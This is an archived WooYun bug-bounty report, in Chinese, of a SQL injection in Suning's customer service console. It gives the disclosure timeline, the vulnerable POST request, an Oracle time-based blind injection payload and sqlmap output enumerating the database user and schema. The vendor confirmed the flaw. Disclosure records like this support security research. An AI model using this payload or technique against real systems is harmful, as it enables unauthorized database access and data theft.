乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-07-20: 细节已通知厂商并且等待厂商处理中 2015-07-20: 厂商已经确认,细节仅向厂商公开 2015-07-30: 细节向核心白帽子及相关领域专家公开 2015-08-09: 细节向普通白帽子公开 2015-08-19: 细节向实习白帽子公开 2015-09-03: 细节向公众公开
小胖子,你!
苏宁客服系统
POST http://online.suning.com/console/Service/commissionGoods/pageCommissionGoods HTTP/1.1Host: online.suning.comcompanyId=1&filterParams=+1+%3D+1++and+creator+like+'%251%25'++and+category+like+'%251%25'++and+brand+like+'%251%25'++and+code+like+'%251%25'+&page=1&rows=20&sort=id&order=asc
POST parameter 'filterParams' is vulnerable. Do you want to keep testing the others (if any)? [y/N] nsqlmap identified the following injection points with a total of 325 HTTP(s) requests:---Parameter: filterParams (POST) Type: AND/OR time-based blind Title: Oracle AND time-based blind (heavy query) Payload: companyId=1&filterParams= 1 = 1 and creator like '%1%' and category like '%1%' and brand like '%1%' and code like '%1%' AND 1608=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5)&page=1&rows=20&sort=id&order=asc---[23:08:48] [WARNING] changes made by tampering scripts are not included in shown payload content(s)[23:08:48] [INFO] the back-end DBMS is Oracleback-end DBMS: Oracle[23:08:48] [INFO] fetching current user[23:08:48] [INFO] retrieved:[23:08:48] [WARNING] it is very important not to stress the network adapter during usage of time-based payloads to prevent potential errorsSU[23:13:12] [ERROR] invalid character detected. retrying..[23:13:12] [WARNING] increasing time delay to 6 secondsNINGcurrent user: 'SUNING'[23:19:54] [INFO] fetching current database[23:19:54] [INFO] resumed: SUNING[23:19:54] [WARNING] on Oracle you'll need to use schema names for enumeration as the counterpart to database names on other DBMSescurrent schema (equivalent to database on Oracle): 'SUNING'[23:19:54] [INFO] testing if current user is DBAcurrent user is DBA: False[23:19:54] [WARNING] schema names are going to be used on Oracle for enumeration as the counterpart to database names on other DBMSes[23:19:54] [INFO] fetching database (schema) names[23:19:54] [INFO] fetching number of databases[23:19:54] [INFO] retrieved: 9[23:21:31] [INFO] retrieved: A
危害等级:高
漏洞Rank:10
确认时间:2015-07-20 09:37
感谢提交,单个漏洞按照较低金额计算。
暂无